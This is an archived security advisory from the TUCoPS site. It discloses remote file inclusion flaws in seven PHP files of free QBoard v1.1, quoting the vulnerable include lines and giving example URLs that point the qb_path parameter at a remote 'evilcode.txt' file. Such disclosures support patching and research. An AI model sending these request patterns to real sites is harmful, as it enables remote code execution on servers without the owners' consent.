TUCoPS :: Web BBS :: etc :: b06-3423.htm

free QBoard v1.1 Multiple Remote File include
free QBoard v1.1 Multiple Remote File include
free QBoard v1.1 Multiple Remote File include



free QBoard  v1.1 Multiple Remote File include=0D
-------------------------------------------------=0D
Discovered By CrAsh_oVeR_rIdE=0D
Arabian Security Team=0D
-------------------------------------------------=0D
site of script:http://sourceforge.net/projects/freeqboard/ =0D 
-------------------------------------------------=0D
Vulnerable: free QBoard  v1.1=0D
-------------------------------------------------=0D
vulnerable code:=0D
----------------------=0D
1- in index.php=0D
include $qb_path."incs/mysql.php";=0D
include $qb_path."incs/crypt.php";=0D
----------------------------------=0D
2- in about.php=0D
include $qb_path."incs/header.php";=0D
----------------------------------=0D
3- in contact.php=0D
include $qb_path."incs/header.php";=0D
----------------------------------=0D
4- in delete.php=0D
include $qb_path."incs/mysql.php";=0D
include $qb_path."incs/crypt.php";=0D
----------------------------------=0D
5- in faq.php=0D
include $qb_path."incs/header.php";=0D
----------------------------------=0D
6- in features.php=0D
include $qb_path."incs/header.php";=0D
----------------------------------=0D
7- in history.php=0D
include $qb_path."incs/mysql.php";=0D
include $qb_path."incs/crypt.php";=0D
----------=0D
$qb_path parameter File inclusion  =0D
-----------------------------------------------------------------------------------------------------------------------------------------=0D
vulnerable files  :=0D
--------------------=0D
index.php=0D
about.php=0D
contact.php=0D
delete.php=0D
faq.php=0D
features.php=0D
history.php=0D
-------------------------------------------------=0D
example:=0D
www.example.com/(path)/index.php?qb_path=http://evilcode.txt?=0D 
www.example.com/(path)/about.php?qb_path=http://evilcode.txt?=0D 
www.example.com/(path)/contact.php?qb_path=http://evilcode.txt?=0D 
www.example.com/(path)/delete.php?qb_path=http://evilcode.txt?=0D 
www.example.com/(path)/faq.php?qb_path=http://evilcode.txt?=0D 
www.example.com/(path)/features.php?qb_path=http://evilcode.txt?=0D 
www.example.com/(path)/history.php?qb_path=http://evilcode.txt?=0D 
-------------------------------------------------=0D
Discovered By CrAsh_oVeR_rIdE=0D
E-mail:KARKOR23@hotmail.com=0D 
Site:www.lezr.com=0D 
Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3, mr-hcr AND ALL LEZR.COM Member=0D
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH